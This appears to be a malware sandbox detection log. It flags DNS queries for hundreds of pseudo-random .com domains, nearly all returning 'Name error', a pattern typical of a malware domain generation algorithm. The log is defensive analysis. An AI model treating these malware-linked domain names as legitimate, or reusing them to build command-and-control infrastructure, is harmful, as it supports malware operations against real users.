DNS traffic detected: English language letter frequency does not match the domain names

Tries to resolve many domain names, but no domain seems valid

Source: unknown	DNS traffic detected: query: puzypug.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qexysig.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pumytup.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gahynus.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lykyjux.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qebylov.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vofydac.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pupytyl.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pupydig.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qexyriq.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pujyxyl.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pufybyv.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: volydot.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gacyvah.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qetytug.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: puvyxil.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pufymyg.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: purywop.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lyrygyn.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vonymuf.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vofyqit.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: puzyxyv.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vopyret.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pujymip.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qedyvuv.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: galypyh.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: galyfyb.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qexyxuv.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gaqyzuw.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pumywaq.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gaqyhuz.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vowydef.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qeqysag.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: volykit.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vonycum.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qekyxul.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qebyrip.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gacykeh.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qexyhuv.com replaycode: Server failure (2)
Source: unknown	DNS traffic detected: query: vowybof.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gadyneh.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lyxymed.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lyryfyd.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pujybig.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qexyvoq.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qeqyhup.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gacyhis.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qegyrol.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lysymux.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gadypuw.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gaqyvob.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qekyheq.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qekykup.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vocycuc.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lyryxij.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qexykug.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: volyzef.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qeqyfaq.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qexyfel.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vofygum.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gahykih.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gaqykab.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vonyzuf.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: puvymul.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qedyveg.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vofykoc.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vopycom.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lykygaj.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gacykub.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vojygok.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vowykaf.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vowymyk.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lymyvin.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qetyrap.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vonydik.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vofymik.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gatycoh.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: puvyjop.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gahyvuh.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vowyzuk.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: purydyv.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gatyqih.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qegytyv.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vojykom.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vopykak.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lyxylor.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vofygaf.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lymylyr.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qedynaq.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pujygaq.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gatydaw.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lygywor.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lysywon.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: galyquw.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lysyvud.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lysysod.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gadyrab.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qegysoq.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qegynap.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pufygug.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: puvyliv.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gatyvyz.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qetyfop.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qedyfyq.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: purycap.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: purydip.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gadyveb.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vofybyf.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qetyvil.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lyvylod.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: purycul.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gadyfuh.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vonyqok.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vonyjim.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lyrytod.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: volypum.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lykymox.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: galyhiw.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qedysov.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gacypyz.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pupypiv.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: purytyg.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qeqyxov.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ganydiw.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lyryvex.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: puzyjoq.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lykyvod.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pufyjuq.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vonypyf.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gaqyzoh.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qeqykog.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vowydic.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vocyrom.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ganyqow.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vopyjuf.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pumyjig.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qetylyv.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: volymum.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pumybal.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vocyzek.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pumymuv.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lyrytun.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lymymud.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qetyquq.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ganycuh.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: galyvas.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lykynyj.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qexyqog.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: volymaf.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vopybyt.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lyvylyn.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gahyhob.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qebysul.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gacydib.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vocymut.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gatyzys.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gadyduz.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pupygel.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qebytiq.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pupymyp.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gatynes.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: volyqat.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: puzyjyg.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qegyqaq.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pupycuv.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lyvywed.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gahypus.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vojyjof.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gahycib.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gadyzyh.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qexylup.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vojymic.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pumypog.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vonyryc.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: puzybep.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ganyzas.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qedyhyl.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vowyjut.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pufydep.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lykynon.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gadyhyw.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lysytyr.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lyxyfar.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pufypiq.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qebyrev.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gacynuz.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lykytej.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vowycac.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: purypol.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lyxyjun.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ganykaz.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vojyrak.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lyryjir.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: puvytuq.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vocyjic.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qeqyqiv.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gadyvis.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pujypup.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qegykiq.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lykygur.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gatyduh.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qebyhuq.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ganypih.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qedyrag.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vowypit.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gahyqub.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gacyryw.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qekyqyl.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lyryled.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gaqynyw.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: puryjil.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lyxyjaj.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pupywog.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gaqyfah.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qegyhev.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vocydof.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vonygec.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qetytav.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: purygeg.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qeqytal.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gacyqys.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qekysip.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lykymyr.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qebynyg.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vojyjyc.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pujygul.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: puzytap.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gadyfob.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qeqytup.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pufywil.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gatycyb.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gaqycos.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lyxyxyd.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vowygem.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gaqypew.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qekyhil.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gahyfow.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qegylep.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qetyvep.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gahynaz.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qexykaq.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lygyfir.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gacycus.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pumycug.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qebyxyq.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ganyriz.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: galycuw.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lygynud.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vofymem.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lyrymuj.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qebyfav.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lyxywer.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lyvyxyj.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lykysix.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vojycif.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lymyjon.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qegyxug.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vocypyt.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: puvygyq.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qebyqil.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: puvydov.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pumyliq.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pujyteq.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lymyfoj.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vopydum.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: galyros.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lyvytuj.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qekykev.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pujymel.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qedyfog.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: puvybeg.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pupyjuv.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qedyxip.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pujydag.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vonybat.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vopymyc.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vopygat.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vojybek.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ganyrys.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lygyvar.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qexytep.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pufydul.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gatyviw.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lysynur.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gadyquz.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: puzylol.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vojyquf.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: puryxag.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lymytar.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lymytux.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qetykol.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vocygyk.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lysynaj.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qedytul.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pujywiv.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qekyrov.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pumyxiv.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vopyqim.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pufycol.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lyryxen.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vocyqaf.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pumylel.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gacyzuz.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pufytev.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pumytol.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: volykyc.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: volyrac.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qebykul.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pupybul.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gatyfaz.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lysyxux.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gahyzez.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pupyxup.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lymywaj.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lyrynad.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vocyruk.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lykyxur.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gacyroh.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qetysal.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gahyhys.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ganyhuh.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: puzyciq.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vowyrym.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: purypyq.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gacyzaw.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lysylej.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vofypuk.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: galykiz.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pujyjup.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gaqyqis.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qeqynel.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lymysud.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: puryxuq.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: galyzeb.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lyxywij.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: purybav.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pufymoq.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: volygyf.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gaqycyz.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qeqylyl.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pumyxep.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qebyvop.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lyvyjyr.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: puzywel.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qekyvav.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pupylaq.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qebyteg.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pumypyv.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: puzymig.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pujyjav.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lyvytan.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qegyfyp.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lyvymir.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: galydoz.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lymylij.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gacyqob.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lygysij.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pupyboq.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lyvyfad.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vowypek.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lyvyjox.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lymyxex.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gacyfew.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pujycov.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: purymuq.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vofyjuk.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qetynev.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lyxygud.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qetysuq.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lyrywax.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vopydek.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qeqysuv.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lykyjad.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lygyged.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qegyfil.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gahyraw.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lygyjuj.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lygymoj.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lygymyn.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lyryfox.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gaqypiz.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: puvywup.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ganynyb.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lyvyguj.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: galykes.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vojypuc.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vocykif.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: puvytag.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qexyqyv.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vopycyf.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ganykuw.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: puvywav.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pufyxug.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qedykiv.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vojyzyt.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lygylax.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lysyger.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qexylal.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qekylag.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lyvynen.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lyvywux.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qegyqug.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: volyquk.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lyvyvix.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lygyfex.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: puzydal.com replaycode: Name error (3)
